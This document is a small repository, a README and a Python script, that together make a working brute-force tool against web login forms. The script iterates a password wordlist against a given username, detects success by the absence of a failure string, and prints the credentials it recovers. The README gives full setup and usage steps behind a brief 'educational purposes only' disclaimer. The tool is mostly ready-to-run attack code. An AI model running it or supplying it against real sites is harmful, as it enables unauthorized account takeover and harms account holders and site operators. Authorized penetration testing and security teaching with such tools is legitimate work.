├── README.md
└── bruteforce.py


/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # Brute-Force Attack
 3 | **Description:** This is a Python script for performing a simple brute-force attack on a login page. It takes a username and a list of passwords from a file, and then iterates through each password, attempting to log in to the target website until a valid password is found.
 4 | 
 5 | ## Requirements :
 6 | - Python 3.x
 7 | - `requests` library (install with `pip install requests`)
 8 | - `termcolor` library (install with `pip install termcolor`)
 9 | 
10 | ## Usage:
11 | 1. Make sure you have Python installed on your system.
12 | 2. Install the required libraries by running the following commands:
13 | 
14 |   ```python
15 |   pip install requests
16 |   pip install termcolor
17 |   ```
18 | 3. Save the list of passwords in a file. Each line in the file should contain one password.
19 | 4. Run the script using the following command:
20 | 
21 | ```python
22 | python script.py
23 | ```
24 | 
25 | 5. The script will prompt you to provide the necessary information:
26 | 
27 | - Enter the URL of the login page.
28 | - Enter the username for the account you want to brute-force.
29 | - Enter the path to the password file.
30 | - Provide the string that occurs on the page when login fails.
31 | - Optionally, provide the cookie value if the website requires it.
32 | 
33 | 6. The script will start the brute-force attack and display the attempted passwords. If it successfully finds the correct password, it will print the username and password and exit.
34 | 
35 | ## Important Notes :
36 | - This script is intended for educational and ethical purposes only. Only use it on systems that you have explicit permission to test.
37 | - Brute-force attacks are not recommended as they can be illegal and may cause harm to the target system. Use it responsibly and with caution.
38 | - Always use strong and unique passwords to protect your online accounts.
39 | 
40 | # Disclaimer
41 | **The author of this script is not responsible for any misuse or damages caused by using this script. Use it at your own risk.**
42 | 
43 | *Happy hacking responsibly!*
44 | 


--------------------------------------------------------------------------------
/bruteforce.py:
--------------------------------------------------------------------------------
 1 | 
 2 | import requests
 3 | from termcolor import colored
 4 | 
 5 | url = input('[+] Enter Page URL: ')
 6 | username = input('[+] Enter Username For The Account To Bruteforce: ')
 7 | password_file = input('[+] Enter Password File To Use: ')
 8 | login_failed_string = input('[+] Enter String That Occurs When Login Fails: ')
 9 | cookie_value = input('Enter Cookie Value(Optional): ')
10 | 
11 | 
12 | def cracking(username,url):
13 | 	for password in passwords:
14 | 		password = password.strip()
15 | 		print(colored(('Trying: ' + password), 'red'))
16 | 		data = {'username':username,'password':password,'Login':'submit'}
17 | 		if cookie_value != '':
18 | 			response = requests.get(url, params={'username':username,'password':password,'Login':'Login'}, cookies = {'Cookie': cookie_value})
19 | 		else:
20 | 			response = requests.post(url, data=data)
21 | 		if login_failed_string in response.content.decode():
22 | 			pass
23 | 		else:
24 | 			print(colored(('[+] Found Username: ==> ' + username), 'green'))
25 | 			print(colored(('[+] Found Password: ==> ' + password), 'green'))
26 | 			exit()
27 | 
28 | 
29 | 
30 | 
31 | with open(password_file, 'r') as passwords:
32 | 	cracking(username,url)
33 | 
34 | print('[!!] Password Not In List')
35 | 
36 | 
37 | 


--------------------------------------------------------------------------------